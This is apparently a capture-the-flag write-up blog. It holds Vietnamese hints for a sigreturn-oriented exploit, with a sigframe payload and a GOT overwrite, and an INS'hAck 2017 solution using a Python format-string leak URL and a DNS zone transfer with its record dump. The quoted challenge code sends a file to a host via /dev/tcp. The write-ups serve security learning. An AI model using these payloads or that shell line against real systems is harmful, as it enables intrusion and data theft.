Unexploitable (pwnable.tw 500) – Code War là một kỉ niệm buồn

Code War kết thúc, đã tới lúc phải trở lại với cuộc sống bình thường, bớt ảo tưởng, bớt mơ về những cái vốn nó không phải là của mình.
18120257_619477578250031_1863298449_o
Một noober đáng thương 😥
18110325_619477678250021_292883367_o
Bài này được coi như là note của mình về một kĩ thuật pwn mới. Và nếu có ai đọc được thì cũng chỉ là hint thôi.
Ở đây mình lưu ý những điều quan trọng sau đây:
– Control được eax và gọi được syscall sẽ là có tất cả (ebp mình sẽ không nói, vì đương nhiên chả có chương trình lỗi bof nào lại không control được ebp cả) vì SROP ( thay vì mình syscall exec thì mình syscall signal return ) rất vi diệu.
– sau khi read, số kí tự read sẽ trả về eax -> Control eax.
– Đè GOT (Global Object Table) 1,2,… bytes là một kĩ thuật rất hay nhưng không được sendline vì sendline sẽ có thêm “\n” làm mục đích mình bị thay đổi khá nhiều.

Sau đây là ý tưởng exploit:
Bước 1: ROP lần 1, để read 1 đoạn fakestack vào BSS, ebp mang giá trị fakestack cộng 8 ( debug để căn ebp cho chuẩn ).
Bước 2: Read vào BSS đoạn fakestack và đương nhiên phải control ebp để tí sài tiếp.
Bước 3: Read sigframe vào một nơi nào đó ta có thể control được, đủ quyền execute. Sigframe sẽ có dạng như thế này.

sigframe = p64(read_plt) + p64(0x0)
sigframe += (p64(0x0) * 2) * 6
sigframe += p64(bsh) + p64(0x0)    # rdi rsi
sigframe += p64(0x601040) + p64(0x0) # rbp rbx
sigframe += p64(0x0) + p64(0x3b)   # rdx rax
sigframe += p64(0x0) + p64(0x601040) # rcx rsp
sigframe += p64(read_plt) + p64(0x0) # rip eflags
sigframe += p64(0x33) + p64(0x0)   # cs err

Bước 4: Đè got 1 byte để read sẽ biến thành syscall, đồng thời ROP về return to sys_rt_sigreturn
Bước 5: Execute sys_rt_sigreturn bằng cách read 13 byte để frame thanh ghi quay về mô hình của mình
Ok vậy là xong, code thì mình sẽ không share để cho các bạn trải nghiệm, vì trải nghiệm mới thấy được điều kì diệu.

INS’hAck 2017 (key: DNSSec, FormatString python, exploit PATH, leak libc)

It’s just over 3 hours after the asis ends, so I do a little challenge in web and pwn

1. PYTHON ( Web )

from flask import Flask, request, render_template 
import subprocess 
app = Flask(__name__) 

@app.route('/') 
def index(): 
	return render_template('index.html') 

@app.route('/source') 
def sourcecode():
	return render_template('./static/source.py') 
@app.route('/flag') 
def get(): 
	if request.method == 'GET': 
		ip = request.args.get('ip') 
		port = request.args.get('port') 
		print "ip: ",ip,"port: ",port
		flag = open('flag.txt').readline() 
		allowed = {"allowed_ip" : "8.8.8.8", "allowed_port" : port, "allowed_flag" : flag} 
		if ip and ip != '' and port and port != '': 
			if port.isdigit(): 
				if ip == allowed.get("allowed_ip"): 
					subprocess.Popen("cat flag.txt > /dev/tcp/" + str(ip) + "/" + str(port), shell=True, executable="bash") 
					return ("SUCCESS: The flag have been sent to DST IP %s and DST PORT %s\n") % (ip, port)
				else:
					return ("You have choose IP "+ ip +", but only %(allowed_ip)s will receive the key\n") % allowed 
			else:
				return ("Port invalid\n") 
		else: 
			return ("Please choose an IP and a PORT\n") 
	else: 
		return ("FAIL: Method HTTP not allowed (%s)\n") % (request.method) 
if __name__ == '__main__': app.run(host='0.0.0.0', port=4444)j

We can see this source called

flag = open('flag.txt').readline()

and used on

allowed = {"allowed_ip" : "8.8.8.8", "allowed_port" : port, "allowed_flag" : flag} 

but the variable `allowed_flag` is not used

By the way

return ("You have choose IP "+ ip +", but only %(allowed_ip)s will receive the key\n") % allowed

tell me it uses formatstring python, so we can force it show

return ("You have choose IP %(allowed_flag)s, but only %(allowed_ip)s will receive the key\n") % allowed

payload is: http://localhost:4444/flag?ip=%(allowed_flag)s&port=8080

2. DNSSEC
We can google for some attack in DNS
For this challenge, read https://www.adampalmer.me/iodigitalsec/2013/08/16/dns-zone-transfer-axfr-vulnerability/

DNS located in dnssec.challenge-by.ovh
Database located in datastore.challenge-by.ovh

We can find ip of DNS by dig or drill

$ drill dns.challenge-by.ovh
;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 4337
;; flags: qr rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 4
;; QUESTION SECTION:
;; dns.challenge-by.ovh.  IN  A
;; ANSWER SECTION:
dns.challenge-by.ovh.  2382  IN  A  213.186.33.16
;; AUTHORITY SECTION:
challenge-by.ovh.  88619  IN  NS  ns110.ovh.net.
challenge-by.ovh.  88619  IN  NS  dns110.ovh.net.
;; ADDITIONAL SECTION:
ns110.ovh.net.  171  IN  A  213.251.128.154
ns110.ovh.net.  171  IN  AAAA  2001:41d0:1:199a::1
dns110.ovh.net.  171  IN  A  213.251.188.154
dns110.ovh.net.  171  IN  AAAA  2001:41d0:1:4a9a::1
;; Query time: 39 msec
;; SERVER: 87.98.175.85
;; WHEN: Sun Apr 9 01:15:43 2017
;; MSG SIZE rcvd: 190

but this server 213.251.128.154 is not a master DNS Sever, so we need to test deeper

$ drill dnssec.challenge-by.ovh @213.251.128.154
;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 61418
;; flags: qr aa rd ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;; dnssec.challenge-by.ovh.  IN  A
;; ANSWER SECTION:
dnssec.challenge-by.ovh.  3600  IN  A  167.114.236.142
;; AUTHORITY SECTION:
;; ADDITIONAL SECTION:
;; Query time: 39 msec
;; SERVER: 213.251.128.154
;; WHEN: Sun Apr 9 01:20:46 2017
;; MSG SIZE rcvd: 57

Try to take some more test and we can’t see another server, so we focus it is master server.
Use the “DNS Zone Transfer (AXFR) Vulnerability”
test with UDP but no working, so I try with TCP

drill -t AXFR datastore.challenge-by.ovh @167.114.236.142 | grep "IN TXT"                                                                   
datastore.challenge-by.ovh.  604800  IN  TXT  "Hint: use this name server for your queries."
00NCOV5KYHGNE27FW9PYKM2B.datastore.challenge-by.ovh.  604800  IN  TXT  "iVBORw0KGgoAAAANSUhEUgAAAoAAAAHaBAMAAABiHuUcAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAeUExURd7e3gEBAf39/UdHRyAgIHBwcF5eXjU1Nb29"
03HJO32QZHAZMFMN3Z32BNV1.datastore.challenge-by.ovh.  604800  IN  TXT  "vZKSkpCPZ1IAACAASURBVHja7FtLb+PIESYGCOA5NtgRr4ZPyVGwJSXHhmgSuSWQJY+PgkR65ihIlpObkWAD+bbYwF7r36brxZf4aK+TAcYWAavlJlkf6+PXxWZXyUuN"
03QBLCKTC7BFFW2KKDCU8ZXA.datastore.challenge-by.ovh.  604800  IN  TXT  "UsFEKQ0fRt2t7NcBfCQrH7p97B7Yo8zdUil1t9Rwik6gJ+orre76tnvQx+5gZmyPf217Ijg6ulJgzAzgwN6VdG+XgiGt3R2Ref4wARgZ8wdjYEvGWjC0mz/iR5c/1nHs"
06G0CYE31H6QUFR55P7LFUFP.datastore.challenge-by.ovh.  604800  IN  TXT  "YYwKlrew+/Bi9EzBtdvdCk61B2I3XIdCQLJ8OdepkmMisWz34YGIqoKMKWsCTx3AgT70XMK33lIwstZ2znMMMAXoyDkYIYysbcdw80f86PbnEnoSxkjKWF56CEgWByu8"
092WIMWDHRAR0G8HJ9AOY6LI.datastore.challenge-by.ovh.  604800  IN  TXT  "+gKBeNblkgHR5wzwck4HIqCPzgELvWsCvMsA74hAwZBWCGQMAL4mddnzJoKRte0Ybv4E7EfQ6c8lypgxKlh1CtRyx+oJLABGVcCiAudkuYlAwwSaBgJ1O4FtGG7+1BDY"
0EH8NYXLIM4US72T75JLPY40.datastore.challenge-by.ovh.  604800  IN  TXT  "4E+uwBoCX6FAhyGsZs4E1iswH8KByxB2JLDWH5chTP60EEgxkMievCoGJlVATXdMleJTjwI8faBz6HPkGgN9hxh4iOHmj/jR7c9lZt5+VLBQgXpBA0UAh6R7xEJUIjBi"
0FFJJPQUJGBU6MDJM1L7J6V6.datastore.challenge-by.ovh.  604800  IN  TXT  "D9MMHWPGZfGpBZbY7SV5eFcG7DGLjJG1TGCUsUgEsgwZI2vbMRz9ET86/UECBaOChQrEY8ky7e6jRQwO6DATuMzvAd1IvGPbOV2MTIhYHWjPaumuLwwRgdesJcLIWiFw"
0FGTVEA75OXPLPG0ACFQ0MHL.datastore.challenge-by.ovh.  604800  IN  TXT  "KZenM73YvogxpG3HcPRH/Oj051J0D4YrWF4q9vDSCRCGEJwKssbhRIB4SWyCLg8BcTpku+E6MMyQc4ht+8AuDad8eNluwZCWCRQMjoFIrcUTDGnbMRz9ET86/UECBaOC"
0M1R0KHQR1JNHGKLBCN1DCN4.datastore.challenge-by.ovh.  604800  IN  TXT  "hQrEGws6Z0CwBsdt+/x0IkCw6i/oJsIuBgSZ+7d0Bg4+cg4uAM4IFnLbM3WAM4IhLRMoGKxANewjn4IhbTuGoz/iR6c/SKBgVLBIgf7EBPjQIkB4Q0iA/wlHEgKENwR4"
0NQOD2XFS11O2GP3D9RFS3JW.datastore.challenge-by.ovh.  604800  IN  TXT  "SdAzgxN3jhkwQgZznLXjxF2ci25VdA3G+hqjFjtnLWyXOYa0TKBgsALBQjTJMbK2HcPNH/Gj059LMkIYZSztEc4wTZY5oIrSFFWQpEm/QKCfpjh8tmmCKqB4q3ppOjFo"
0Q6ZEKKV3755G8FHPU2ZI05C.datastore.challenge-by.ovh.  604800  IN  TXT  "JCUjPg3kNJ2tyBg+0PLudFXAkJYJFAxWoLb/9gsY0tZjSLejP+JHlz/ULRhlLO8cv+vzC2xVhIBqPTKl7i3+q8bnuFuvR9Tt97nblLoDwg3ON2QMdweGu+PMiCliKf+i"
0RFMML23K2XPYQ3FXJSOFEWR.datastore.challenge-by.ovh.  604800  IN  TXT  "iKH0bckIY2RtLYYo0NEfueAuf8QIY5SwPPW9tjBU73H7bgTqzb15h/zp70ZgEIfmqMA3jeDN6kjg2xR4JPBNBL5PBeqjAo8x8BgDjwQeY+BRgccYeIyBRwKPMfD/rMD4"
0TDUENPK6LJIBNEHNQ6QYUPM.datastore.challenge-by.ovh.  604800  IN  TXT  "+C78thh4JPBtWt9s3ieBtJyuh7fo3jjl9V/qDoa0JivdwRCP0tuFoX9pgTfgRXg2krd93L1erJDAkJaF4zKG3U3MbudFrAaMbHcdBhhZvsafMa16d/gTp9TtZxe8yndL"
17GKBPV0HJLX7PAGX0H3FI1G.datastore.challenge-by.ovh.  604800  IN  TXT  "TmSBWYEgOccET0wpBD1YYGohSIeYedBDSrJEk+GEd18gbkoXv+AUA7V6iyep8SyZWi/jMJjO0Ng55kSChK5nPENjap3OVQGrAcOf0TVkGCljUPeYsxhu/sQpEdjuj04W"
1K6XW0WYTTS00FPIENEFZKK1.datastore.challenge-by.ovh.  604800  IN  TXT  "mEkJ0lQVsQiDFBgsiHVIYUMuZxgvmHLMS9nbSmV9F5LexCSXvX+Y5NpuKFPL3dJG15hZ9Pez5OXxaRVu9M3ueXF/Mwm3cFZyTk6lK0xy+bfRnCWEmdd6DEhzgsgyjAvK"
1RXNRRZAI2QPUEOW0MD7KSRL.datastore.challenge-by.ovh.  604800  IN  TXT  "GlkkTKQtxkt3f/Qi5sRVqz/20DF0Dzd0xzMsxKC0Joyeuz6mWDWWFGJxBCZLoZQwhRwfPAg4n3pFSVPIPANCqHBkQxekrYEIaP3VYLlObnaweSerONQ/eyf2++PTdG8N"
1WXZO1NI7F8L1V24UIHICORU.datastore.challenge-by.ovh.  604800  IN  TXT  "X3AZyDVVK2jTmyuVYTVgYM52kmNoztlyolkbSio5+mMo89fhj/UZs56hosIfxmIMUiAm4ZdZop+rSzCTb81QtQDe6TyjP6GqAcr44R0DLUBCWtrx8OVx5/H2B1DgL/zP"
210K9C0ZVO9HF60JOWKV6SYX.datastore.challenge-by.ovh.  604800  IN  TXT  "ye5xNtoEWU7/oDJh1YSBmcTUZBjFqgEcV1yZ4OgP5Z7b/ZHiCOhWBSzGoOIiriXpZfVnCEi1JFdce9vPCBziOM3qVtiylloSNDa9T/YZe8AZKvA079jtp09osV8uLmKs"
21WXPRBU95W8E4YWV5YT5LER.datastore.challenge-by.ovh.  604800  IN  TXT  "egx60HBNV6FuBesKDmtjOv3h6odWf/A+UXhJVY4lGFRcxDVuvaz+TGdVb/YY7CkQSNVMxs8K+EjyXM0Edywe7HYPXnH7Iyjw51LXbje7oFOpLoAIZKwGjFL9cqVyCh8X"
22SI3SUFOT91G36MG3ABNCMT.datastore.challenge-by.ovh.  604800  IN  TXT  "eXWWiz+kwHZ/pAJMZMxYYhEVSPV0Myq8yY+Verq8Zq9UmOhn9VEqN5JaO+GwJL5MgWFRgbg9Pq2nRtXUBzZg0NVntXtGCKzUSDv7o7MCpkZ/jNQgyiUwlmCUSny5ejQD"
23379ZQ05130FBHT2VGW1JS2.datastore.challenge-by.ovh.  604800  IN  TXT  "vCoCLisErqT8lu+YVHT2nm5evIPNKjCsKJCi4X5pDglcNmCU65cPq0crFaqd/hQJbPInmpfvIWMJRqnEtwIoJbGDMoHBIWB+x5KLrw8Ph/xZBcIQPq3Z8zjZHNZIN2Bw"
2D1S50MDJSLOVDANORJI9GPT.datastore.challenge-by.ovh.  604800  IN  TXT  "9Whj/XI7gYf+UA1imz9pJ4G/WYEmKkhe7liw39fRBwqM6xSIsfBpmTQosIrBCuw3VdC/VoFBcQjX+aOYQCwLRSOCVVIg2Zm8KgYmpncYM8bf6ulDBdbEQBHhfl4bAw8w"
2DSMOFTSCZKBEX7GBBQE52KR.datastore.challenge-by.ovh.  604800  IN  TXT  "Kr/hUOUYmD1EnP0pDOFaf2AfKbAaA1eCkReZ24+o7qk1aX0KE+CQeN3eNPHXpkCg99+m5SmcY9BV2IdIqmoLwIsPERd/Dp/CJX/ww+dfQ5Xu4WClJ4WnsOZAiGrf9kuA"
2KE1VQ67XXWZMW1WN5XY09ZD.datastore.challenge-by.ovh.  604800  IN  TXT  "veXBPDCtnzclyYvXuDXHQNr906o8D6zHIN/51yWV+uXSPNDRH5oHpq+aB97JPFDl80AMjD2eouczd82vk6jtZKWK8wVrGX+IQSMb79jLrpm/DgXCMF5SsGGsegxSAtcv"
2KORIXGE63X68C41TB73V0P6.datastore.challenge-by.ovh.  604800  IN  TXT  "k1joTWQuvwuhNxFXf4jABizGQF7z2XiGxRheNrve0ksiPdvoWJii2z+YsdKsNa/Whz/eTbdGN4a/7hiI2+f9Fb/swl8tBq0owd92LqpAAkEl9GbH78KO/hCBDViMgQZo"
2NYP9Z8CR8T0GJ9U00XDGR93.datastore.challenge-by.ovh.  604800  IN  TXT  "JYMugbEYgxRoHzJ4nL0XPVqgILKvaPWC6+CFQPlpQMRvmxZWBV+91q1TgRAIOcQA1iEG+ZDQbnh1pTFB9cv82wEh0NUfioENWIJxN5fK6lQVsBiD1gN1MhriD0tnayoi"
2VGHIVW87EU894VZ7BB58U38.datastore.challenge-by.ovh.  604800  IN  TXT  "pjr+IBkNMIRO1nS1XFs8uMUFqWBGu21H+KWdv64YSNtzAesAI+WluzUs5enkllYRiUC1XaxpqZIel67+kAIbsATDn42Si8IlMBZj0BBWcUJrstsZHUqAapzgmqyWbiYw"
2WPKL3402T805V0IA4DD35M7.datastore.challenge-by.ovh.  604800  IN  TXT  "SGhNdjylJVt189LBn4sCLcvPOVZcxRjwKjHtDviCefnEdtMaMxeZO/pDCmzCEoz1jBeuU1XEIgyPK5e15H7KbeVfOUybUrffyZ9DDCQNmsxoBaPaXWkPut38ccNquoT/"
2YWLDEZ7V5Q11W1POI00Z8ED.datastore.challenge-by.ovh.  604800  IN  TXT  "VVIp+NLJn5sC7fafD5gXduHPLQb+iAy+nUDtwp+zAn84Bt9MoP7qwsrhinTzkb9+LAL/7MTfp1JOpIPBq48UA//hxp8l0Crwn2enTgzOP44Cf//Qzcep3T7JQ8R+7T7j"
300UTTASRT1XDU78WJTAO3BI.datastore.challenge-by.ovh.  604800  IN  TXT  "8+qjEOj/3Cm9M8ge7ffPYRyG3/YvL7sH7+ysi8SfzMcgsOMB/MmO2N3j02wxurfsbTabMLxfD5Ob/Q53vYtH8dti4J/axeedPM5GYWiwBiC2EjQ4dw/jNeSM2ym8+ggK"
31UX8623FBCW5VRGUFT0T49V.datastore.challenge-by.ovh.  604800  IN  TXT  "/MtDm/q83dNtaEKtdQibFWCMX0Kt7Mfavj63UXjSf/8EBi38nZ3unkehFR5QF8Ygvzjc2BbGcWiMpXWdvLQN5N+Zd0/glxb6Tp5GRplQNssXcGesIMOQhGiUXn/bfWpm"
333PVF4CVSGP0TN9KTNQXYLK.datastore.challenge-by.ovh.  604800  IN  TXT  "8Nf3HgObZ4Bn3uMiNDl3MIjvgbcYA6LJaV3fPDSK8ORv71uBvYfG6Hcy2cDY3SBHlrtz++B92tj/k+l0trgPNVAYA5s6HLw0ifDT5x9iEHsbXuoypVbXr4hl3aH+a+Pw"
371EYU9OY5VWPOXLGFYFGBHM.datastore.challenge-by.ovh.  604800  IN  TXT  "fbw1ikdpGFvuoFCGXuVg1njy+JSOLMH0aDFh/K1RhP8qX5mqv7Ly7tD8Nn/qj97UdpewPFqbHScTWpPlpe6EunWCb1V6O6U12SG328Xfa122k+ST5w3QZ+Odioc3L6jT"
3DHO0ZZHR5NYVNS9INPGAPXV.datastore.challenge-by.ovh.  604800  IN  TXT  "0zN8lQt/sVNoO4k+2e1nIyAZoqEKB40MznGVmJaFoxmvSE9HtFpM9cPbqSw9q7IfLv4E3K2GtDLNWIKhh+wtdw+mdHQJy6MUw2BEWYEF1VFub2nZfzhEwPHkv9xdTU8b"
3EYY8IR1WIX9RST6J65FUR20.datastore.challenge-by.ovh.  604800  IN  TXT  "SRMetUTUHFvu2NfRnMjRWvDCccRgb25EYAK3RcYOOVpryHIbkTeJfSNfwP7b7ar+mP4aM7CbV/EiZe0dj6ddj6u7qqueefwOWwv68XJS00EX0/c1IDMTucqg95fAM83S"
3GEJWFBI3779UXLFIUKPIH3R.datastore.challenge-by.ovh.  604800  IN  TXT  "VFek+Rd4mhIIvpAhSgg579dNYzGJO5N32KfYHemeyADlenrqA+uXNQlaHm5oT08eZpcSKX0xNYY4fOgcfrOLX5o7VoL9KWCrI0t4ivwxoNuAfFBrs40D9qayxaoe+a81"
3MVX62QRGDP5RHCLRI08DHSJ.datastore.challenge-by.ovh.  604800  IN  TXT  "CyBJF2d68l7el4SYLRvBcpapxpBE7FGEq8JKKcAeHNcgeAefDqmnf+Q96Rw5sp6hr7gl+4pI1v1FNnyMHY3sgdYmSon9atqbMJYeo7Mp1ZHUGNCCw16eO1aCnTy4TB+v"
3O73D7IWM4SXHBM3Y7FBECMY.datastore.challenge-by.ovh.  604800  IN  TXT  "jQO2z3TbGgdETVcleSXbrC/r8NtE98v55UnpJnl+RZoQ8EKEUKSFg7ci8Y58KXSzl6vWuFIkO5ANIuRin6ne5dR0zLQdzewBOCTxjxtNPHExPYaSl9JjIORWe1ONkUih"
3OUL301D6FHPBAS6HKQ27WQA.datastore.challenge-by.ovh.  604800  IN  TXT  "MnFO+40ZEHrGstGPA2KnCy6hHlm8tEzSDzPEgw3GIsFLIxVp51iW0Q8Qb0Q8zoud6yzKV4BPLIlhhvgNVAxkDRzI9vgFfEbZ+NV2NLMHIFB6fYbmtndmxtB0LjUGfCF2"
3U038GRR549C66MGHRIFG4QJ.datastore.challenge-by.ovh.  604800  IN  TXT  "l16NkaCGI1zc1tubRnnLhlOyXYPfFPHjl8cJiXflgrfMD8AJRcLDaxD8yLRWmqQSnbKKGzNSWsin+mVtR0N78CIT44FSc/RMj8FsjcK+1CiU5EBnrASpWopppAfEL9vi"
3UHCCRC7AGFE4ML41362FZ9E.datastore.challenge-by.ovh.  604800  IN  TXT  "LXfVd6Aeoyug8T++U/ruhyz9SEk/FfP4wyaXs37nOq0pDbZr2Vltlzml7Whoj2JlaewkR/q1HkMD2La0qq3lQo8BAHZrVG+Zp2uqH49r8IP0hdXkdTQkmatq6+IAd8zC"
4G6JM6HIW2WHWHY7DAF4VCAQ.datastore.challenge-by.ovh.  604800  IN  TXT  "B6OR5OsSfqDPHtV2NLPH0k6NalZ7QrcVD9sZK7HZlsxVvWWeNLF8PH0eLTvD/J0VbNfwy+lcP5byPhHtge4LJFt/nXPpgzEEaVfTbg0KFUe6ApCPlgEYtcfSw45KLtcq"
4JEF2E0AMUYOF3JYLTV73GXX.datastore.challenge-by.ovh.  604800  IN  TXT  "BTtjxQHM6wHsj2J7kGwdZmLB+vdwM5K8iWGu72YAoDa6A7UG6heouhMipXPwQcgIz2MIfgw40pXG89M80OFhVx7YGMBHe6AzhfvHS/C7vElpKT1rrvAR/weIbXSLWefa"
4JPLUD7408GA7VSPY8KK0WST.datastore.challenge-by.ovh.  604800  IN  TXT  "BlCfkMwTejsFBPPBcRZrMVkMVUfj2eYvLweQsSW3UrAazepatXQfwDCILFsDY1VUQs+YxC9LBToaOYUTPktFhi0BLPUULvV5Ihh/VwjeRBD8GK6BWuNZauk/GESWrYET"
4NUFNEJ8D3LIHM1TT1Y1RC84.datastore.challenge-by.ovh.  604800  IN  TXT  "44GtmjVQjbEkiEg58U6gu8w83jI+nscCyB3id1FmCBZVnlXK/xJ4VgEILpfYJ8A7kg+4DrJ+GU5ielTlgVLjuUpj3LuItB0N7YlGYa1ZXaUxgVa1MxYm0jW6y8zTdkbi"
4OLGT4KQ2WR04KH0XSY31W48.datastore.challenge-by.ovh.  604800  IN  TXT  "Y8QB0485rn83mYRDz1GDEvwTAO5eO9HFIAz/0lsZSS5ISkP2r/FAtF2s+zCfgL/8Wi9XzL7nr6E9lX50RLPazQMdrWpnrAR3LYqfyTzdZU/bGR4jZdQME+h89x6mH3gf"
4UPSVZMSZIA8KN64YTA48RHW.datastore.challenge-by.ovh.  604800  IN  TXT  "ndv4yGfpYVG04h4I7xCpzy00nuLJzDcz1zyNZ37gTCtjRzN7Kv1oHtOsVpOaB1rVzlgJJooAekR32dN2hlsBbiIL4KbEL0k1HJYHUgvANol6oHxG0q+AYN6JBJJn5lND"
4ZLSBPXABJBMF4HVLS2I2ICU.datastore.challenge-by.ovh.  604800  IN  TXT  "5LQ1npWOtO2gYEczeyr9aKNZjVv+yQNa1c5Yibxd/ChvRXSXfW3ni82d+AI4EHbLYkDogehgAkBe9EmtB2LNFS4kvolwGUSuh5Rr8DSeQWbaIkFrO5rZA79mI/dmlWb1"
54V3KNYFQVKDSMKWBOX8N56H.datastore.challenge-by.ovh.  604800  IN  TXT  "axZqVavDRj/aGSuRygW9iaIBG91lWUuUA2pt59Y4XAEJLIC5SOGoA0fggd948ZzUrYH43mxdxHIRSK5IWkZq02P5gVyNZ60jrfnL2o5m9hj9aAkgH7ua1YFWtVJ5cMZK"
54WJFBG1WRR7G6W2BZGSAK64.datastore.challenge-by.ovh.  604800  IN  TXT  "PIFlV3dZazsPlHLyeaRz0RUTmImVS+IS90BxQAC4t9QDzW6Gn2exLrGRspYfWGk8d5TqNHP1sJvZY4SilWY19zSrjVa1vMiuuogz1uOaSvvhBD5kg4LtXWcBHIEH5nuk"
5BT5LFKFJ5ISFD4X6337QHZE.datastore.challenge-by.ovh.  604800  IN  TXT  "PgprTgwsg62QR/jpv9GV83fBNMnEBJ7lu5DAUANY4IFAKBIAvqz3QLV+pl9xGbwKIjH9Wflaj+sL70cncM4hcKaQMSN4KcIh0mcVljGRTj5xgYusbCkAxTtU3E5lWUHs"
5EG2Z2HC3XDW9BFWOXG56DFL.datastore.challenge-by.ovh.  604800  IN  TXT  "STYOYRnkYST+33/BA4M6IEbgGZcOU3ng3N6JULmVyz7x4io6hQVs1JyarU9xEge1wZ+2SfwYAINCNFmTEzjF2socPW+higl0LqsGAhV8FB64k7gvmEeq6zfzEteEQjur"
5GCM1ZPDEKX5AETTX9U27C85.datastore.challenge-by.ovh.  604800  IN  TXT  "9fd59QEMdnFk4wwncKLh0PhoOPDJAo+T9zzfxm2vfmGu32EDqiZxzvd9F1xb/TUw2MWR90ykgFfQT68ATMyDAlDWBwHAc6rxsj1RFxDVC2oS75EVIU4/AsCgJfRiKrYg"
5I45J5PT0RD9GNFX03ENF5VX.datastore.challenge-by.ovh.  604800  IN  TXT  "bX+5CmoBVObbPN+vISC478jes2gy+H7VAQwq+RkUsSJZb/zvWcPbROTCMBNfzGpkMs0BPA9SmKmwc480QiUhjQHE0CQm8XYWq8ms7hrY8kMI7G7zTkNQAJXOTbNTE0yO"
5JDSYMXUY2D4INWKFIM1I65A.datastore.challenge-by.ovh.  604800  IN  TXT  "io6/Nqyvtgf+FtL3ihnbaTiBIZFrXTc8NVvvChdkf2YRstbqAui7D9SnIglvrQe+aA6g2CDCjq7zJV2BMJI8MYRgDt04gmBjuN0YQLJxCqnMlXd1mq/wGrgdOqCIIMIB"
5KLS2PZ7HASNR2Q527VMVNB0.datastore.challenge-by.ovh.  604800  IN  TXT  "KX3w1jdVkaolBQe8rJI8i66Cn1fXA3kZOmCB24WqzVsmXt88sQ9snD53X9CNdfPEekeZvoJUxl8Fn60ugC/DECxTGOrt4CxA7zUseEL66qVLWTAALvTeRQmG0nuxo3vG"
5L562ID4PYGJQIBDAQFWZRPM.datastore.challenge-by.ovh.  604800  IN  TXT  "BlUf9GdOBQMdafXzglp3WR2+CUOwdEB6n+idbOkBqHGCc8Tfq99Sh7JQURfUCdU7E3RByAXTIBUMNKu7suRsazszoyet7NFC0ax3qg67OtI9pSM9UWXux+tIb3m6y2NX"
5U30PLXV17OTDW2JWVFSXUYF.datastore.challenge-by.ovh.  604800  IN  TXT  "d9lXJSLf+EBuV4WpTv3Urlbpw/LI4XZaURaIU+/yuAxwSbIGNQU/cK+xzpYWb5nEdKSVHewPqSet7enHtap3xw/oSMsxxEW6LNSR3rJ0pFsj2R28lLrLvFe4ussnsfvP"
5V1042ZOSC032TW1QO7D1D5W.datastore.challenge-by.ovh.  604800  IN  TXT  "91O7IK9xJIl5tJkJCb29UQCmc/EilGBNG8oUVKuaNhFRSrjg76nXG7l442o8Sx1pDtrOZ5UdnTdST1rbA53krqVV3YWfhXV1pLv4U7ENdKS9sUIdaXizr7vsEYrIJ5ED"
5XGU6GFVXA7SH14763MLKHI6.datastore.challenge-by.ovh.  604800  IN  TXT  "9olpeTzggaZRYhBKF1C+9nsi1O6ikDXcEXtFmbt33DRlIzrSyg6m9KS1PTVa1VpHWmtnQasc/mkd6dNH6EjnS3WX/W4mUK34eWq1xR3aX6xvnswh5VGYkvXZBaF/VQhb"
60WV16KZYK8WVYHN2PTH0WTY.datastore.challenge-by.ovh.  604800  IN  TXT  "0BkAU8gF/brguqSh1OlIKzuY92va/dOoVrVuZwIZRutIX5waFoTWkR6xuI50/rCONAqPilngz2CRpeX90m661XqgOcHB6RvjNwt1swmwEmjggVhBFC74MvPmMHc0q10d"
68WCL41LXLUZWK2MSLMC4CIF.datastore.challenge-by.ovh.  604800  IN  TXT  "aYsTI3/PXdkT5UhPWUP9QJeH/SQdaU/ZSUTIWb5NPQDrPFA13ex+p9hosJ3b3pZeJDNxAvE8UCy0sCP2M5lPEogJi+lIV5/aAlDYg+ysUKt6uY40V2P8CzrSV2WYw7TK"
696G1HXXZ2GVL4YJ0A0NA9P7.datastore.challenge-by.ovh.  604800  IN  TXT  "+RM8UHUvabcoLr6PJzcyDKWLE+jPpS6A2Iea+ZnMmvTAuI60tkMDqO2p4Tt6GqqejjS3daRb/0hHejsSQv5Mq+75oz2QnvHZ5XA4kZTf6xebxX66uPc8EOoPUPEm3q03"
6JHKJHINE1GK09ZFR99Q44SB.datastore.challenge-by.ovh.  604800  IN  TXT  "1ewNdKQtZmrLrEbtszjJ/FE60u1/pCN944cQPuNf0vmT18AyOeTCA4cTmT9fvxc7nfWjrXLDa80Do2vmh5E7W+O5KYCMxTjfjo70OP9hOtLePlikuJBEW+nz3AYuq2Fu"
6NEO5L0NYZ1SYYYV1O4W2O94.datastore.challenge-by.ovh.  604800  IN  TXT  "0IrBMQdkEEBMxZNvPO9/H/1ynFhOrarYwgW9MPLB1nhmro70oz2wE3pgXEe69YCO9AFborvcDrfBbL/afygoiWQmEJEVGwZHap0A2Z/Kl8sNZw1M7nixOxwfCQBlamk2"
6NRE0ESGBE2ZFEZVDWO82NDS.datastore.challenge-by.ovh.  604800  IN  TXT  "NxubYRihR5V3MHcNnGo7nrIGTmp1pKNa+mYsGYWX6i5v+4U95Jq6HHLFdU4guytd4oFa26wdWwKlHFgD76Xn3hXF7slwckyNz+q6jHhlxrzdyC2rNJ6ZqyPND9worO3x"
6O7Y80UN9KT05MVN5RK8ABWG.datastore.challenge-by.ovh.  604800  IN  TXT  "71RaEoV/gI70ZD9oBkMIMe1wuiirxnp6V1yUC5CDn8/v1QnlwjSKJT4Udmk4hWUhBwAcDo9OrA67uuQ6hBGvRbzInTlmdKR5pe3spDGXT8wD2RIdaf4YHWlvG5K+KjCE"
6OTY4LCJ0NQQ2P1WK7X59HGN.datastore.challenge-by.ovh.  604800  IN  TXT  "GDzu5xYzYWPKOve3sPWrTqjKfRKWBNkbW8PhWL1VTOGB8EAbQPVGhJq7pX2qXS6iIz12dyLanuq2TATQ15FWL/8oHem3npJijrSBEv6qG7YSODDHOis/ORrtELgfhFKv"
6V38U7F6MYJF6WQJ96WJM6Z1.datastore.challenge-by.ovh.  604800  IN  TXT  "TqrSyE2QMRoPj96WsucuthyDIfxvUib2JSklHyOpYJfV6kgrO5ilaA72AKbtiiP9f9SRFvh7hQSw1q+R2BEanenI91q3Hw801L5YAo+J2hkaACOdlHAOf2a1OtLaDvPb"
